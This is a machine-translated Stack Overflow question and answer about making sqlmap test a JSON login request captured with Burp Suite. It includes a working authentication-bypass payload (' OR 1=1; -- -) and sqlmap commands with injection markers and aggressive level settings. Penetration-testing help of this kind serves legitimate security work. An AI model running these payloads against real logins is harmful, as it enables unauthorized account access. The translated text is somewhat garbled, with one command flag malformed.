SQLMAP-将JSON数据作为主体发布_Sql_Sql Injection_Burp_Sqlmap

SQLMAP-将JSON数据作为主体发布

sql

SQLMAP-将JSON数据作为主体发布,sql,sql-injection,burp,sqlmap,Sql,Sql Injection,Burp,Sqlmap,嗨，我正在尝试在登录表单中进行SQL注入我使用Burpusuite拦截请求： POST /xxxx/web/Login HTTP/1.1 Host: 10.0.0.70:42020 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: application/json, text/plain, */* Accept-Language: it-I

嗨，我正在尝试在登录表单中进行SQL注入

我使用Burpusuite拦截请求：

POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close

{"username”:"user",”password”:"pass"}

使用：

sqlmap -u requestFile

（其中requestFile是通过Burp截获的请求的内容）

sqlmap找不到作为密码的可注入字段

我确信这是可注射的原因，如果作为密码输入：

' OR 1=1; -- -

我可以使用插入的每个用户名登录

还尝试了：

{"username”:*,”password”:*}

但是没有运气

我做错了什么？

sqlmap-uURL

sqlmap-r请求文件

关于如何使用请求的教程

示例：

POST / HTTP/1.1
Host: www.example.com

{"username":"*", "password":"*"}

另存为

sqlrequest.txt

然后可以使用以下命令启动测试：

py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl

然后，您应该会收到一个提示，提示您找到了自定义注入标记，并且在POST正文中找到了JSON数据。处理这两个问题，然后你就可以开始了

资料来源：

这个问题可能更适合，但由于这是一个中间地带，我不打算在这里结束投票。你可能会在那里得到更多的答案。好的，欢迎来到StackOverflow。这个答案应该通过添加关于代码项正在做什么的描述，或者解释这个解决方案的工作原理来改进。